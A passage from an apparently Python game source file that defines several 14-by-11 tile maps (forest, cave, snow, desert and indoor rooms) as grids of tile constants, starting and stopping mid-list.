    [RROCKTWO, WWATERNINE, WWATERFOUR, GTREE, LLONGGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, LLONGGRASS, GGRASS, BROCK, RROCKTWO],
    [WWATERNINE, BWATER, WWATERFOUR, RROCKTWO, GTREE, GTREE, GGRASS, GGRASS, RROCKTWO, BROCK, GTREE, GGRASS, BROCK, BROCK]
    ]
#Third Map - grid of tile-ID constants indexed [row][column] (dense forest clearing)
tilemapthree = [
    [GTREE, GTREE, GTREE, RROCKTWO, GTREE, GTREE, GTREE, GTREE, GTREE, RROCKTWO, GTREE, GTREE, BROCK, SSTUMP],
    [GTREE, GTREE, BROCK, GTREE, GTREE, LLONGGRASS, GGRASS, GGRASS, LLONGGRASS, LLONGGRASS, GTREE, GTREE, GTREE, GTREE],
    [RROCKTWO, GTREE, GTREE, GGRASS, SSTUMP, LLONGGRASS, BROCK, GGRASS, GGRASS, GTREE, GTREE, GTREE, GTREE, GTREE],
    [GTREE, GTREE, LLONGGRASS, LLONGGRASS, GGRASS, GGRASS, GTREE, LLONGGRASS, GTREE, LLONGGRASS, GGRASS, BROCK, GTREE, RROCKTWO],
    [LLONGGRASS, GTREE, GTREE, SSTUMP, GTREE, GGRASS, LLONGGRASS, RROCKTWO, GGRASS, GGRASS, BROCK, BROCK, RROCKTWO, LLONGGRASS],
    [GGRASS, LLONGGRASS, RROCKTWO, GGRASS, RROCKTWO, GGRASS, SSTUMP, GGRASS, GGRASS, LLONGGRASS, GTREE, LLONGGRASS, GGRASS, GGRASS],
    [GGRASS, LLONGGRASS, GGRASS, GTREE, BROCK, LLONGGRASS, LLONGGRASS, GGRASS, GGRASS, GTREE, GGRASS, GGRASS, GTREE, GGRASS],
    [BROCK, RROCKTWO, LLONGGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GTREE, GGRASS, LLONGGRASS, GTREE, GTREE, GTREE],
    [GTREE, GTREE, GGRASS, LLONGGRASS, GGRASS, RROCKTWO, GGRASS, BROCK, LLONGGRASS, GGRASS, GGRASS, SSTUMP, GTREE, BROCK],
    [SSTUMP, GTREE, GTREE, GGRASS, RROCKTWO, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GTREE, GTREE, GTREE, GTREE],
    [GTREE, SSTUMP, GTREE, GTREE, GTREE, GTREE, GTREE, BROCK, BROCK, GTREE, GTREE, RROCKTWO, GTREE, GTREE]
    ]
#Fourth Map - grid of tile-ID constants indexed [row][column] (cave interior with stair exit)
tilemapfour = [
    [DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE],
    [DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, CCAVEWALLTWO, CCAVEWALL, CCAVEWALLTWO, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE],
    [DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKRIGHT, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, DDARKLEFT, DDARKTILE, DDARKTILE, DDARKTILE],
    [DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKRIGHT, CCAVEROCKTWO, CCAVEFLOOR, CCAVEFLOOR, DDARKLEFT, DDARKTILE, DDARKTILE, DDARKTILE],
    [DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKRIGHT, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, DDARKLEFT, DDARKTILE, DDARKTILE, DDARKTILE],
    [DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, CCAVEWALLTWO, CCAVEWALL, CCAVEWALLTWO, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, CCAVEWALL, CCAVEWALL, CCAVEWALLTWO, CCAVEWALL],
    [DDARKTILE, DDARKTILE, DDARKTILE, DDARKRIGHT, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, CCAVEROCKTWO, CCAVEFLOOR, CCAVEROCK, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, CCAVESTAIR],
    [DDARKTILE, DDARKTILE, DDARKTILE, DDARKRIGHT, CCAVEFLOOR, CCAVEROCK, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, CCAVEFLOOR, CCAVEROCK, CCAVEFLOOR, CCAVEROCK],
    [DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP, DDARKTOP],
    [DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE],
    [DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE, DDARKTILE]
    ]
#Fifth Map - grid of tile-ID constants indexed [row][column] (snow forest)
tilemapfive = [
    [SSNOWTREE, SSNOWTREE, SSNOWROCK, SSNOWROCK, SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWROCK, SSNOWROCK, SSNOWTREE, SSNOWTREE, SSNOWTREE],
    [SSNOW, SSNOWTHREE, SSNOW, SSNOWTREE, SSNOW, SSNOWTRUNK, SSNOWTREE, SSNOW, SSNOW, SSNOWTREE, SSNOW, SSNOWTREE, SSNOW, SSNOW],
    [SSNOW, SSNOWROCK, SSNOW, SSNOWTREE, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOWTRUNK, SSNOWTHREE, SSNOWTRUNK, SSNOW, SSNOW, SSNOW],
    [SSNOW, SSNOW, SSNOWTRUNK, SSNOW, SSNOW, SSNOWTWO, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW],
    [SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOWTHREE],
    [SSNOWTWO, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW],
    [SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOW],
    [SSNOW, SSNOW, SSNOWTHREE, SSNOWROCK, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW],
    [SSNOWTRUNK, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOWTRUNK, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTRUNK, SSNOWTRUNK, SSNOWTWO, SSNOW],
    [SSNOWTHREE, SSNOWTRUNK, SSNOWROCK, SSNOWTRUNK, SSNOWTWO, SSNOWTREE, SSNOW, SSNOWTRUNK, SSNOW, SSNOWROCK, SSNOWROCK, SSNOW, SSNOW, SSNOWTHREE],
    [SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWTREE, SSNOWTREE, SSNOWROCK, SSNOWROCK, SSNOWTREE, SSNOW, SSNOWTREE, SSNOWTREE, SSNOWROCK]
    ]
#Sixth Map - grid of tile-ID constants indexed [row][column] (open desert)
tilemapsix = [
    [SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSANDROCKS, SSANDROCKS, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
    [SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSANDROCKS, SSAND, SSANDSHROOMTHREE, SSANDSHROOMTWO, SSANDSHROOMONE, SSAND, SSANDSHROOMTHREE],
    [SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND],
    [SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
    [SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSANDROCKS, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
    [SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
    [SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
    [SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSANDROCKS, SSAND, SSANDROCKS, SSAND],
    [SSAND, SSAND, SSANDSHROOMONE, SSANDROCKS, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSANDSHROOMTHREE],
    [SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND],
    [SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND]
    ]
#Seventh Map - grid of tile-ID constants indexed [row][column] (snow clearing ringed by trees/rocks)
tilemapseven = [
    [SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWTREE, SSNOWTREE, SSNOWROCK, SSNOWROCK, SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWTREE, SSNOWTREE],
    [SSNOWTRUNK, SSNOW, SSNOWROCK, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOWROCK, SSNOWROCK, SSNOWROCK, SSNOWTWO, SSNOW, SSNOW, SSNOWTRUNK],
    [SSNOW, SSNOWTRUNK, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOWTRUNK, SSNOW],
    [SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOWTRUNK, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW],
    [SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOW],
    [SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOWTWO, SSNOW],
    [SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE],
    [SSNOW, SSNOWROCK, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW],
    [SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOWTRUNK, SSNOW, SSNOWTWO, SSNOWTHREE, SSNOW, SSNOW, SSNOWTHREE, SSNOW],
    [SSNOWTRUNK, SSNOWTREE, SSNOW, SSNOW, SSNOW, SSNOWROCK, SSNOW, SSNOW, SSNOWROCK, SSNOWROCK, SSNOW, SSNOW, SSNOW, SSNOW],
    [SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWTREE, SSNOWTREE, SSNOWTREE, SSNOWROCK, SSNOWROCK, SSNOWTREE, SSNOW, SSNOWTREE, SSNOWROCK, SSNOWTREE, SSNOWROCK]
    ]
#Eighth Map - grid of tile-ID constants indexed [row][column] (open snow field)
tilemapeight = [
    [SSNOW, SSNOWTWO, SSNOW, SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOWTWO, SSNOW],
    [SSNOWTWO, SSNOW, SSNOWTHREE, SSNOW, SSNOWTWO, SSNOWTWO, SSNOW, SSNOWTWO, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOWTWO],
    [SSNOW, SSNOW, SSNOWTHREE, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOWTHREE],
    [SSNOW, SSNOWTHREE, SSNOWTWO, SSNOW, SSNOW, SSNOWFOUR, SSNOWFOUR, SSNOWFOUR, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW],
    [SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWFOUR, SSNOW, SSNOW, SSNOWFOUR, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW],
    [SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOWFOUR, SSNOWFOUR, SSNOW, SSNOWFOUR, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOW],
    [SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWFOUR, SSNOW, SSNOWTWO, SSNOW, SSNOW],
    [SSNOW, SSNOW, SSNOWTWO, SSNOW, SSNOWTWO, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWFOUR, SSNOWTWO, SSNOW, SSNOW, SSNOW],
    [SSNOWTHREE, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWFOUR, SSNOWTWO, SSNOWTWO, SSNOW, SSNOW, SSNOWTHREE],
    [SSNOWTWO, SSNOWTHREE, SSNOW, SSNOWTWO, SSNOWTWO, SSNOWFOUR, SSNOWFOUR, SSNOWFOUR, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOWTWO],
    [SSNOW, SSNOWTWO, SSNOWTHREE, SSNOWFOUR, SSNOWFOUR, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOW, SSNOWTHREE, SSNOWTWO, SSNOW]
    ]
#Ninth Map - grid of tile-ID constants indexed [row][column] (grass arena walled by trees/rocks)
tilemapnine = [
    [RROCKTWO, GTREE, BROCK, GTREE, GTREE, RROCKTWO, BROCK, RROCKTWO, GTREE, BROCK, GTREE, GTREE, BROCK, RROCKTWO],
    [GTREE, GTREE, BROCK, GTREE, RROCKTWO, LLONGGRASS, GGRASS, GGRASS, GTREE, GGRASS, GTREE, GTREE, GTREE, GTREE],
    [BROCK, GTREE, RROCKTWO, LLONGGRASS, GGRASS, LLONGGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, GGRASS, LLONGGRASS, RROCKTWO, BROCK],
    [RROCKTWO, GTREE, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GTREE, BROCK, GTREE, RROCKTWO],
    [LLONGGRASS, GTREE, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, BROCK, BROCK, RROCKTWO, GGRASS],
    [GGRASS, GGRASS, LLONGGRASS, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, BROCK, GGRASS],
    [GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GTREE, GGRASS],
    [BROCK, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GTREE, GTREE, GTREE],
    [RROCKTWO, RROCKTWO, LLONGGRASS, GTREE, LLONGGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, LLONGGRASS, BROCK, GTREE, GTREE],
    [BROCK, GTREE, GTREE, GTREE, RROCKTWO, GGRASS, GGRASS, GGRASS, LLONGGRASS, GGRASS, GTREE, GTREE, BROCK, RROCKTWO],
    [GTREE, BROCK, GTREE, BROCK, GTREE, GTREE, RROCKTWO, GTREE, BROCK, GTREE, BROCK, GTREE, GTREE, GTREE]
    ]
#Tenth Map - grid of tile-ID constants indexed [row][column] (desert with scattered rocks/shrooms)
tilemapten = [
    [SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSANDROCKS, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSANDSHROOMONE],
    [SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSAND],
    [SSANDSHROOMTWO, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSANDSHROOMONE, SSAND, SSANDROCKS, SSAND, SSAND, SSANDSHROOMTHREE, SSANDROCKS, SSAND, SSANDSHROOMTHREE],
    [SSAND, SSANDROCKS, SSANDROCKS, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND],
    [SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSANDSHROOMONE, SSANDROCKS, SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND],
    [SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
    [SSAND, SSANDSHROOMTHREE, SSAND, SSANDSHROOMTHREE, SSAND, SSANDSHROOMTHREE, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
    [SSANDSHROOMTWO, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSANDSHROOMONE, SSAND, SSANDSHROOMTHREE, SSANDSHROOMTWO, SSANDSHROOMTHREE, SSAND],
    [SSANDSHROOMTHREE, SSANDSHROOMTHREE, SSAND, SSANDSHROOMTWO, SSAND, SSANDSHROOMTWO, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMONE, SSAND],
    [SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSANDROCKS, SSANDSHROOMONE, SSAND, SSANDSHROOMONE, SSAND, SSANDSHROOMONE, SSAND, SSAND],
    [SSAND, SSANDROCKS, SSAND, SSAND, SSANDSHROOMTWO, SSANDSHROOMTWO, SSAND, SSANDROCKS, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSANDSHROOMTHREE]
    ]
#Eleventh Map - grid of tile-ID constants indexed [row][column] (denser desert)
tilemapeleven = [
    [SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND],
    [SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSANDSHROOMTHREE, SSANDSHROOMTWO, SSANDSHROOMONE, SSANDSHROOMTWO, SSANDROCKS],
    [SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND],
    [SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSANDROCKS, SSAND, SSANDROCKS, SSAND, SSAND],
    [SSANDROCKS, SSAND, SSANDROCKS, SSAND, SSANDSHROOMTHREE, SSANDROCKS, SSANDSHROOMTWO, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMONE],
    [SSANDSHROOMTWO, SSAND, SSAND, SSANDROCKS, SSAND, SSANDSHROOMONE, SSANDROCKS, SSANDROCKS, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND],
    [SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSANDSHROOMTWO, SSANDROCKS, SSANDROCKS, SSANDROCKS, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND],
    [SSANDROCKS, SSANDSHROOMTHREE, SSAND, SSAND, SSANDROCKS, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
    [SSAND, SSANDSHROOMTWO, SSANDSHROOMONE, SSAND, SSANDSHROOMTWO, SSAND, SSANDSHROOMTHREE, SSANDSHROOMTWO, SSAND, SSAND, SSANDSHROOMTWO, SSANDROCKS, SSAND, SSANDSHROOMTHREE],
    [SSAND, SSANDSHROOMTHREE, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND],
    [SSANDSHROOMTWO, SSAND, SSAND, SSANDROCKS, SSANDSHROOMTWO, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND]
    ]
#Twelfth Map - grid of tile-ID constants indexed [row][column] (desert; contains the SSANDX marker tile)
tilemaptwelve = [
    [SSAND, SSANDSHROOMTHREE, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND],
    [SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND],
    [SSANDROCKS, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSANDROCKS],
    [SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSAND, SSANDROCKS],
    [SSAND, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSANDSHROOMONE, SSANDSHROOMTWO, SSAND, SSAND, SSANDSHROOMONE, SSAND, SSANDSHROOMTHREE],
    [SSANDSHROOMTWO, SSAND, SSANDROCKS, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSANDROCKS, SSAND, SSANDSHROOMTHREE, SSAND, SSAND, SSAND, SSAND],
    [SSANDROCKS, SSAND, SSANDSHROOMTHREE, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMONE],
    [SSANDSHROOMTWO, SSAND, SSANDSHROOMTWO, SSAND, SSANDROCKS, SSAND, SSANDROCKS, SSAND, SSAND, SSAND, SSAND, SSANDSHROOMTHREE, SSAND, SSAND],
    [SSANDROCKS, SSAND, SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSAND, SSANDSHROOMONE, SSANDSHROOMTWO, SSANDX, SSAND],
    [SSAND, SSANDSHROOMTWO, SSAND, SSAND, SSAND, SSAND, SSAND, SSAND, SSANDROCKS, SSANDSHROOMONE, SSAND, SSAND, SSANDSHROOMONE, SSANDSHROOMONE],
    [SSAND, SSAND, SSAND, SSANDROCKS, SSANDROCKS, SSANDSHROOMTHREE, SSAND, SSANDSHROOMTWO, SSANDSHROOMONE, SSAND, SSAND, SSAND, SSAND, SSAND]
    ]
#Thirteenth Map
tilemapthirteen = [
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLTOPLEFT, WWALLTOP, WWALLTOP, WWALLTOP, WWALLTOP, MMOUNTEDWALL, WWALLTOPRIGHT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLRIGHT, FFLOORWALL, FFLOORWALL, FFLOORWALL, FFLOORWALL, FFLOORWALL, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLRIGHT, TTABLE, TTABLE, TTABLE, TTABLE, TTABLE, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLRIGHT, CCHAIRTWO, FFLOORBASIC, FFLOORBASIC, CCHAIRONE, CCHAIRONE, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLRIGHT, CCHAIRONE, FFLOORBASIC, CCHAIRONE, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[WWALLBOTTOMLEFT, WWALLBOTTOM, WWALLBOTTOM, EEXIT, WWALLBOTTOM, WWALLBOTTOM, WWALLBOTTOMRIGHT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK]
]
#Fourteenth Map
tilemapfourteen = [
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLTOPLEFT, BBOOKWALL, WWALLTOP, WWALLTOP, MMOUNTEDWALL, WWALLTOP, WWALLTOPRIGHT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLRIGHT, FFLOORWALL, FFLOORWALL, FFLOORWALL, FFLOORWALL, FFLOORWALL, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, BBED, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, CCHAIRTWO, CCHAIRONE, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLBOTTOMLEFT, WWALLBOTTOM, WWALLBOTTOM, EEXIT, WWALLBOTTOM, WWALLBOTTOM, WWALLBOTTOMRIGHT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK]
]
#Fifteenth Map
tilemapfifteen = [
